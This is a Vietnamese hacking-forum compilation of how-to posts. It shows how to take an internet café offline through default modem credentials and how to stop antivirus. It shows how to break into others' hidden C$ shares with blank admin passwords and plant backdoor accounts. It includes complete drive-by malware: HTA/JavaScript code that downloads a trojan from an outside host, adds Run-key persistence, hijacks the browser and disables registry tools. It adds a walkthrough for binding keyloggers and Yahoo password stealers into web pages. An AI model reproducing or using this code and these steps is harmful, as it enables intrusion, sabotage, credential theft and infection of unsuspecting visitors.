Đến đây, bạn vào Start > Run > gõ cmd > trong màn hình DOS, bạn gõ tiếp
ipconfig > Ngay tại dòng Default Gateway sẽ hiện ra địa chỉ truy cập của MODEM, bạn hãy ghi nhớ.
Tiếp theo, vào IE > gõ địa chỉ đó vào
VD: sau khi làm nãy giờ, tôi dc IP: 192.168.1.1 , tui vào IE vào gõ vào dãy số trên .

Sau khi gõ xong, bạn sẽ nhận dc trang web cấu hình MODEM đó. Bây giờ, bạn phải vượt qua thêm 01 ải nữa: đó là username và password truy cập MODEM.
Nếu có dc username và password, chúng ta đăng nhập vô, vậy là xong cái tiệm Net !! (^_^)
Q: Nhưng cái username và password đó tui tìm dc ở đâu ??
A:Mỗi loại modem sẽ có 01 username và password riêng, do nhà sản xuất qui định.
Ở đây, tui xin nêu ra vài loại thông dụng tại Việt Nam mình, các bạn có thể tham khảo vào thực hiện nha .

Dòng đầu là địa chỉ truy cập, dòng 02 là username và password nha các bạn !!!
Các loại Modem:

D-Links: 192.168.1.1
Admin - Admin
Planet 10.0.0.2
Admin - epicrouter
Venr 192.168.1.1
admin - admin
Micronet 10.0.0.2
admin - conexant
Cnet 10.0.0.2
admin - epicrouter
MegaZoom 192.168.0.0
admin - admin

++Trên đây là những modem thường sử dụng tại Việt Nam, các bạn cũng lưu ý giữa chữ cái có viết hoa & ko viết hoa nữa nha.
++Có dc địa chỉ, username và password bạn chỉ cần mỗi công việc nữa là làm rớt mạng, hãy thử nhanh đi.

++Nếu một tiệm nào đó, ko sử dụng các modem trênm bạn thử vào http://www.cirt.net/cgi-bin/passwd.pl để tiềm user và pass nha.
++Bước cuối:

Đã có dc tất cả, giờ chỉ cần 01 cái click chuột là tất cả sẽ "chết".
Bạn làm như sau:
---Thường thì các loại modem sẽ có 01 nút mang tên" Reset to Factory Default" , chỉ cần click vào đó, toàn bộ tiệm sẽ "rớt" mạng.
---Nếu ko tìm thấy nút trên, bạn hãy cố tìm nút "WAN", click vào nó, sẽ hiện ra khung có username và password của tiệm Net đó, bạn xóa dòng password đi và nhấn OK (làm như vầy, ISP sẽ ko hiểu dc kết nối nữa => "rớt" mạng.
---Password của tiệm Net thường bị mã hóa thành ***, bạn hãy dùng chương trình Xpass để biến nó lại bình thường.

Sau đó, lên http://user.vnn.vn > chọn mục đổi pass > bạn hãy đổi pass của nó lại (như vầy ít nhất là 01 tuần nó mới có mạng lại dc , vì Bưu điện phải yêu cầu VTC cấp pass lại , he' he' ).

Download Xpass:
http://www.esnips.com/web/WebForum?docsPage=4#files

Đến đây, là xong tất cả rùi đó, bạn hãy cố gắng giữ bình tĩnh sau khi làm nha. Ban đầu tui đổ mồ hôi dữ lắm (vì sợ bị đập, nhưng rốt cuộc sẽ ko ai biết là bạn làm). Nhanh lên, làm ngay đi, chần chừ gì nữa
Khoa Remy

tôi nói cho mấy bạn nghe 1 điều , làm rớt mạng lan của dv nét thì không quá khó khăn đâu làm vậy thì ác quá chổ người ta làm ăn nếu làm vậy người ta mất khack , thì làm sao có tiền trả nhân viên , vã lại máy con chính mình cũng rớt luôn , có ngày người ta phát hiện là đưa lên công an và ăn đòn như chơi .Biết thêm cái này cũng hay để đề phòng lỡ nhà mình có dv net , khi ai chơi thì có thể biết mà khắc phục , chứ đừng dùng cái này làm hoài ở dv thì không ổn đâu . Tôi sẽ đưa ra 2 cách vào thẳng máy chủ mà khỏi cần vào Dos làm gì ... đây là trang web lưu lại toàn bộ thông số của máy chủ và ip mạng lan ++++ và passline và nhiều thông số khác các bạn vào trang web đó và tự tìm hiểu thêm .....

http://www.hackerwhacker.com
khi bạn vào trang này rồi thấy phần free tools nhấp chuột vào đó sẽ hiện toàn bộ thông số máy chủ :
HTTP_ACCEPT What type of media your browser will accept (*/* means everthing) image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
HTTP_ACCEPT_LANGUAGE What language your browser preferes en-us
HTTP_ACCEPT_ENCODING gzip, deflate
HTTP_USER_AGENT Your browser software Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)
HTTP_HOST The Web Site you requested upsilon.hackerwhacker.com
HTTP_X_FORWARDED_FOR 203.210.210.112
HTTP_CONNECTION Connection Control Keep-Alive
HTTP_CACHE_CONTROL Caching Parameters bypass-client=203.210.210.112
REMOTE_ADDR Your ip address 203.162.3.156 .

bạn thấy phần : bypass-client=203.210.210.112 ----> đó là chìa khóa cho bạn vào đấy . Coppy 203.210.210.112 đem ra thanh address gõ vào nếu nó vào thẳng máy chủ thì thôi còn nếu nó hiện ra cái bản đòi pass và id admin ,
thì ở chổ ID bạn gõ : user
'' -------PASS------: pasword
bùm chéo thế là nguyên 1 cái máy chủ hiện ra trước mắt bạn liền , còn phần pass admin bạn dùng phần mềm dịch pass ******* về sẽ rõ còn phần username thì yên tâm không bị mã hóa .

xâm nhập cách 2 : đó là bằng host qua đường chat mirc :
ai rành chat micr sẻ biết lệnh DNS là gì ...
khi bạn connec vào mirc rồi sẻ hiện ra phần host (ip) khi đó đem cái ip ra ngoài cũng gõ lên thanh ADD: và hiện ra cái bảng đòi ID và PASS ADMIN
ta gõ : ID : user
PASS: pasword
thế là xong vào máy chủ đơn giản .Cái này chỉ ngồi ở máy con khi có kết nối với máy chủ thôi còn khi đem passline đi chổ khác thì làm cách này chưa được
đó là 1 nhược điểm . Theo tôi đem cái này mà kể cho Huyremy chắc hén cười quá , thời buổi này toàn ngồi từ xa xâm nhập thôi còn cài này thua rồi , tôi nói câu này chắc có người hiểu ....

trang này rất hay các bạn có thể nghiên cứu thêm
http://www.hackerwhacker.com
trình độ ngoại ngữ kém cũng là 1 rào cản về tin học

NET là lệnh nội trú của Windows 2000, XP nên anh em không cần phải đi tìm nó ở đâu hết, cứ gõ là chạy. Chức năng của lệnh này được phân ra theo một số nhóm sau:

1. Managing Services: Quản lý dịch vụ
NET - START, STOP, PAUSE, CONTINUE

2. Managing File Shares and Printer Shares: Kiểm sóat, chia xẻ tài nguyên
NET - SHARE, VIEW, USE, FILE, SESSIONS

3. Managing Network Print jobs and Network Time: Kiểm sóat tác vụ in ấn và thời gian vào mạng
NET - TIME, PRINT

4. Managing Security: Kiểm sóat bảo mật hệ thống
NET - ACCOUNTS, USER, GROUP, LOCALGROUP

5. Network Messaging: Giao dịch nhắn tin trong mạng
NET - NAME, SEND

6. Managing Network configuration: Quản lý cấu hình của mạng
NET - COMPUTER, CONFIG_WORKSTATION, CONFIG_SERVER, STATISTICS_WORKSTATION, STATISTICS_SERVER

Bây giờ tôi xin đi vắn tắt một số lệnh của NET theo từng nhóm.

1. Managing service:

Cú pháp của lệnh như sau:

NET START [service]
NET STOP [service]
NET PAUSE [service]
NET CONTINUE [service]

Trong đó [service] chính là từ khóa hiển thị trong phần service của Control Panel

Bốn lệnh START, STOP, PAUSE và CONTINUE tương ứng với KHỞI ĐỘNG, DỪNG, TẠM NGỪNG, TIẾP TỤC cái service mà

anh em sẽ chỉ định cho nó thực thi. Để biết tên của các service đang chạy, anh em gõ vào dòng lệnh:

NET START

Lệnh này liệt kê tên đầy đủ của các service đang chạy. Muốn dừng chúng thì phải gõ NET STOP [service] với tên service viết gọn giống như trong Control Panel. Ví dụ anh em đang dùng Norton Antivirus, rủi có chép một trình nào đó như Brutus chẳng hạn thì nó cứ nhảy ra và la lên là cái file đó có trojan bên trong. Thế là nó không cho anh em chép vào máy của mình. Bây giờ gõ lệnh sau:

NET STOP navapsvc

Màn hình sẽ hiện ra

The Norton AntiVirus Auto Protect Service service is stopping.
The Norton AntiVirus Auto Protect Service service was stopped successfully.

Bây giờ anh em ngó xuống cái icon của NAV phía dưới System Tray thì thấy nó bị gạch chéo (disabled) rồi. Đó là do mình tắt bằng NET STOP.

2. Managing File Shares and Printer Shares: Kiểm sóat, chia xẻ tài nguyên
Lệnh NET này đi kèm một số tham số sau: SHARE, VIEW, USE, FILE, SESSIONS

SHARE - hiển thị những chia xẻ trên máy, ví dụ

Share name Resource Remark

-----------------------------------------------------------
IPC$ Remote IPC
D$ D:\ Default share
F$ F:\ Default share
ADMIN$ E:\WINDOWS Remote Admin
C$ C:\ Default share
E$ E:\ Default share
The command completed successfully.

Các share có dấu $ là chia xẻ tài nguyên ở mức hệ thống cho admin, thường gọi là share ẩn.

VIEW - hiển thị tất cả các máy trong cùng domain hoặc workgroup

Server Name Remark

-----------------------------------------

\\CPQ25981604619 DTLong
\\DEFAULT-EBGQAMU
\\FERRARI Formula 1
\\JITH
\\JOE-VT6094JJ9
\\KACE
\\KENGCOM KengCOM
\\LOTUS
The command completed successfully.

Bây giờ ta bàn cách chiến đấu một số máy để tìm tài nguyên. Lệnh Net View cho phép xem tài nguyên chia xẻ của các máy cùng subnet. Cú pháp câu lệnh như sau:

NET VIEW [tên máy]

Ví dụ: NET VIEW \\KACE

Nếu máy này có chia xẻ tài nguyên, màn hình sẽ hiện ra tên của các share directory, lúc này ta chỉ việc phát lệnh sử dụng tài nguyên đó mà thôi.

Để chiếm dụng tài nguyên chia xẻ, anh em có thể dùng My Network Places / Network Neighborhood để truy nhập vào, ở đây ta dùng lệnh NET USE thay cho việc dùng My Network Places

NET USE * \\tên máy\tên share
hoặc
NET USE xxx.xxx.xxx.xxx

Trong đó tên máy là tên hiện ra qua lệnh NET VIEW. Trường hợp sử dụng IP của máy trong NET USE, anh em phải gõ IP vào.

Để biết IP của máy nạn nhân, có thể PING vào tên của máy. Ví dụ

PING LOTUS
Pinging lotus [202.129.41.106] with 32 bytes of data:

Reply from 202.129.41.106: bytes=32 time<1ms TTL=128
Reply from 202.129.41.106: bytes=32 time<1ms TTL=128
Reply from 202.129.41.106: bytes=32 time<1ms TTL=128
Reply from 202.129.41.106: bytes=32 time<1ms TTL=128

Ping statistics for 202.129.41.106:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

Như vậy, máy LOTUS có địa chỉ IP là 202.129.41.106

Trong lệnh NET USE, dấu * có nghĩa là lấy tên một ổ đĩa bất kỳ (từ A-Z) rồi ánh xạ share đó vào ổ đĩa tùy chọn ấy. Nếu trên LOTUS có share một thư mục là SharedDocs thì lúc này lệnh NET USE dùng như sau:

NET USE * \\LOTUS\SharedDocs

hoặc

NET USE * \\202.129.41.106\SharedDocs

Sau khi thành công, SharedDocs biến thành ổ đĩa Z (chẳng hạn) trên máy của anh em.

Có thể chiếm dụng sâu hơn vào trong tài nguyên ẩn của máy. Lệnh gõ như sau:

NET USE * \\202.129.41.106\C$

Nếu lệnh này thành công, ổ C của máy nạn nhân sẽ "bay" về máy anh em như một ổ đĩa của mình vậy. Dùng như trên máy mình và cũng có thể xóa lung tung như nó là của mình vậy. Tương tự, phỏng đoán máy nạn nhân có thể có vài ổ đĩa như D, E, F, anh em có thể thử lệnh trên với D$, E$, F$, G$ tới khi nào nó báo lỗi thì tức là ổ đĩa đó không có trên máy của nạn nhân.

Thường thì các share ẩn này share cho account admin nên khi mình gõ lệnh đó nó sẽ hỏi Username và Password. Nếu đoán được Username (ví dụ: LOTUS) thì gõ vào rồi cũng đóan luôn mật khẩu nhé (hơi khó đấy), bằng không thì anh em nhập Administrator vào cho Username, còn để password là rỗng (sau khi nhập Username thì gõ ENTER tiếp cho phần mật khẩu). Nếu may mắn tiếp thì có thể thóat qua được. Trường hợp này là do admin máy đó sơ sẩy không đổi password mặc định của Windows sau khi cài hệ điều hành. Và như vậy anh em có thể ung dung chiếm tài nguyên của nạn nhân rồi. Anh em sẽ đi du lịch trong máy nạn nhân, chép bất cứ cái gì anh em thích như là đang trên máy mình vậy. Tuy nhiên cơ hội thành công là rất thấp. Vì thế, lệnh NET USE này thường chỉ phát huy tác dụng cao với các máy có share tài nguyên cho mọi người (ví dụ như SharedDocs).

Lưu ý, có một mẹo nhỏ. Nếu anh em chiếm được quyền admin với account Administrator và password rỗng rồi thì anh em có thể dùng con Hyena tạo ra một account cho mình trên máy nạn nhân, đề phòng trong tương lai chúng cài service pack thì NET USE hết đường làm ăn. Lúc đó có con account kia rồi dễ bề tung hoành hơn.

Mấy lệnh trên là những lệnh chính thường dùng. Các lệnh còn lại xin anh em tham khảo thêm trên mạng nhé. Chúng đơn giản nói ra sợ anh em mất thời gian đọc.

Đoạn cuối của phần này xin được giới thiệu cùng anh em các câu lệnh về máy in và kiểm sóat thời gian.

3. Managing Network Print jobs and Network Time:
TIME, PRINT

Lệnh NET TIME cho biết thời gian của đồng hồ trên máy mạng. Câu lệnh là:

NET TIME \\tên máy

Ví dụ: NET TIME \\LOTUS

Lệnh này có nhiều biến thể khác, anh em chịu khó tham khảo. Tôi giới thiệu thêm về lệnh đồng bộ hóa đồng hồ máy mình với máy chủ trên mạng, cú pháp như sau:

NET TIME \\servername /SET /YES

Trong đó servername là tên của máy chủ

Lệnh NET PRINT có cú pháp như sau: NET PRINT \\ComputerName\ShareName

Hiển thị tác vụ hiện thời trên máy in, giống như việc xem xét thông qua Printer Manager xem có những tài liệu nào đang được máy in đó in ra.

ComputerName là tên máy chủ có share máy in
ShareName là tên share của máy in đó.

Để tạm ngưng (PAUSE) một lệnh in, có thể dùng lệnh sau

NET PRINT [\\ComputerName] job# /HOLD

ComputerName là tên máy có share printer còn job# tương đương số thứ tự của tài liệu in trên danh sách các tài liệu đang được in (1,2,3,4...)

Để tiếp tục in sau khi lệnh HOLD được thi hành, gõ vào lệnh

NET PRINT [\\ComputerName] job# /RELEASE

Để xóa, delete một lệnh in, ví dụ trong trường hợp in nhầm một văn bản lớn, anh em có thể gõ lệnh

NET PRINT [\\ComputerName] job# /DELETE
:36_1_17: :36_1_17: :36_1_17: :36_1_17: :36_1_17:

HACK GAME KHÔNG PHẢI LÀ BẺ KHÓA phần mềm mà chỉ là dò tìm các giá trị tài nguyên (gỗ, vàng, sắt...) của game được lưu trong bộ nhớ và sửa thành các giá trị như ý muốn. Nói nôm na thì đó là chơi ăn gian ý mà. Khi bạn sử dụng trainer để thay đổi giá trị các tài nguyên trong Game tức là bạn đã Hack nó rồi đó. Nguyên tắc hoạt động của các trainer cũng giống như các bước để Hack Game nhưng có điều khác là nó đã được định vị trước địa chỉ chứa chỉ chứa tài nguyên nào đó và khi được kích hoạt, nó sẽ tự động cộng thêm vào giá trị tài nguyên đó một con số theo ý bạn.

“Đồ nghề” để hack game gồm những gì? Đầu tiên là phải có một chương trình hack game. Chương trình để hack game thì có khá nhiều: ArtMoney, GameHack, ProHack, TSearch... Trong số đó thì qua sử dụng tôi thấy ArtMoney là tuyệt nhất, vừa miễn phí lại vừa dễ sử dụng cộng với những chức năng rất độc đáo mà các chương trình khác không có. Làm thế nào để hack một game? Ở đây tôi sẽ hướng dẫn bạn hack game bằng chương trình ArtMoney.

Giao diện sử dụng của chương trình vô cùng đơn giản nhưng hiệu quả thì không chê vào đâu được. Ta hãy tìm hiểu các lệnh của nó:

Search: Tìm kiếm giá trị của tài nguyên. Nó sẽ dò tìm trên bộ nhớ tất cả các địa chỉ nào chứa giá trị mà bạn muốn tìm. Bạn có thể tìm một giá trị chính xác hay cả một vùng các giá trị, sau đó bạn nhớ chọn loại giá trị tìm kiếm cho phù hợp, hầu hết các game đều chỉ sự dụng loại giá trị Integer 4 bytes.

Sieve: Lọc các giá trị đã tìm được ở bước đầu. Chương trình sẽ dò lại trong các địa chỉ đã tìm được những giá trị nào bị thay đổi và loại bỏ những giá trị không cần thiết khác đi.

Options: Các thiết lập của chương trình.

Benchmark: Đo tốc độ xử lý của CPU.

Clear: Xóa tất cả các địa chỉ đã tìm được.

Load: Mở lại bảng địa chỉ đã lưu.

Save: Lưu lại bảng địa chỉ đã tìm.

Info: Thông tin về game đang hack.

Bây giờ chúng ta sẽ đi vào ví dụ cụ thể. Đầu tiên bạn phải chạy chương trình ArtMoney trước, sau đó hãy mở game nào đó và chơi như bình thường. Chẳng hạn như bạn đang có 10000 vàng, hãy nhớ con số đó và bấm phím tắt để gọi ArtMoney (thường thì đó là Đây là kết quả sau khi sửa. [Ctrl] + [F12]). Bấm vào nút Search và gõ 10000 vào ô Value. Bấm OK.

Sau đó bạn hãy vào trong game và mua bán hay làm bất cứ cái gì để thay đổi con số 10000 thành một con số khác. Tiếp đến bạn gọi ArtMoney lần nữa và bấm vào nút Sieve để lọc. Nhập giá trị mà bạn vừa thay đổi vào ô Value và chọn OK.

Chương trình sẽ tìm được một giá trị bị thay đổi và nó chắc chắn là số vàng hiện tại của bạn, bạn hãy Add nó vào bảng giá trị và sửa Value của nó theo ý thích. Bạn có thể cho Freeze (đông cứng) giá trị đó lại để khỏi phải mất công sửa lại sau này bằng cách đánh dấu chọn vào trong cột F. Nếu như bạn có nhiều giá trị tài nguyên khác nhau thì bạn có thể đặt Description (mô tả) cho nó để nhận biết loại tài nguyên đó. Đối với các tài nguyên khác bạn cũng làm giống như các bước trên.

Khi các bạn đã sử dụng thành công nhưng do 1 phút sơ sảy mà bị Công An bắt thì chỉ mong các anh đừng réo và khai tên em ra kẻo tội nghiệpCách 1 : dùng một đoạn mã đơn giản để open 1 con trojan !

đoạn mã như sau:
<script language=javascript>
open("http://freewebs.com/nhutuanweb/thanks.exe");
</SCRIPT>

với đoạn mã này bạn gắn dưới thẻ body thì mỗi khi truy cập website nó sẽ tự open con trojan của bạn.

cách thứ 2 là cách rất cao cấp ...

bạn copy vào notepad đoạn mã sau:
<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var burl = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\RunOnce\\\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Run\\\\System32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Policies\\\\System\\\\DisableRegistryT ools",1,"REG_DWORD");');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
<!--- <frameset></frameset> -->

rồi save lại với tên là : hackervn.hta

nhớ là thay đường dẫn của con trojan đi nha..(http://www.freewebs.com/hinhanhlop18/hackervn.exe) là đường dăn tơi kon TJ
sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="hackervn.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>

rồi sau đó bạn upload file hackervn.hta + với website của bạn lên cùng 1 host ...ok mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện+ thêm nó set homepage luôn cho chắc ăn...

cách này rất hay...và cao cấp.

cách thứ 3
là các bạn dùng chương trình gắn trojan vào html: đó là GodWill1.06

chương trình này mình thấy nói rất nhiều trên các diễn đàn nhưng mà chẳng có ai làm được cả...hình như là copy ở site ra thôi.
các bạn downlaod tại đây http://www.freewebs.com/trangchulop18/GodWill1.6.rar ...nếu không down được thì các bạn lên google tìm nha.file kimdung upload lên gồm cả file hỗ trợ nữa nên nó khoảng 1.3Mb. nào bạn hãy tắt các trương trình diệt virus đi dể chúng ta setup

sau khi down về giải nén sẽ có các file sau như hình sau:
http://k.1asphost.com/nhutuan/a.JPG
nhấn kép vào file GODWILL sẽ có hình sau:
http://k.1asphost.com/nhutuan/b.JPG
sau khi bạn đọc xong những điều khoản thì nhấn enter.
http://k.1asphost.com/nhutuan/c.JPG
rồi đến đây bắt đầu xuất hiện những tiện ích của con trojan này.

cái chúng ta quan tâm ở đây là html ! ok nhấn vào chữ HTML:
http://k.1asphost.com/nhutuan/d.JPG
đến đây các bạn nhấn: Genral Options để chúng ta bắt đầu tạo.
http://k.1asphost.com/nhutuan/e.JPG
vì đặc điểm của con này là nó chỉ cho gắn một con trojan khoảng 34Kb thôi nên chúng ta tìm những con trojan nào dưới 34Kb như con MYSPY hay con K2PS hay con hackpass mới nhất đó yjaked1

+ ở mục enter .exe fie bạn mở con trojan đã chuẩn bị trước ra (MYSPY hay con K2PS,yjaked1...)

chọn đường dẫn tới nó.

+ ở mục enter.html bạn chọn đường dẫn cho trang web mình cần gắn trojan.

+ không nhắp chọn Uer defult page

+ ở mục enter.output bạn đổi tên file Geebferh.html thành tên nào bạn muốn.vì sau khi tạo xong thì trang web có gắn trojan sẽ là tên đó ( bạn không được mở trang đó ra)

+ page ICQ notyfi bạn muốn nhấp chọn cũng được nếu bạn có số ICQ thì nhấn chọn để mỗi khi có người open trang web nó sẽ báo về ICQ cho bạn...như kimdung thì chọn hết ngoại trừ "Uer defult page"

rồi xong sau khi đã hoàn thành các bước giờ thì bạn nhấn DOVE được rồi.
http://k.1asphost.com/nhutuan/f.JPG
rồi nhấn GEN để hoàn thành ...Godwill sẽ gắn con trojan của bạn vào trang web của bạn

và nó sẽ tự hoạt động mỗi khi có người mở trang web đó ra.

trojan k2sp là keylogger.

MYSPY là một loại gián điệp

yjaked1 dùng để hack pass yahoo.


Chúc thành công và đừng nhớ đến tui khi bị bắt

Trích dẫn:
Còn Không Đây Là Anh Chàng Đã Mua.A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.

Download:
File Name: SC_keylogger_V3.2_Full.rar
File Size: 1.51 MB

hzzp://depositfiles.com

Sau khi download p/m SC-Keylogger Pro V3.2 ve cac ban se co 2 file : “scklpro.exe & *****hpscklpro.lic (tuy theo ban goc cua nguoi da mua no chinh hang)
P/m này đã có post trên diễn đàn . Nếu ai tìm ko ra tôi sẽ up lai và post sau .
Kích đôi vào File setup : “scklpro “ .
Giao diện sẽ có như sau :
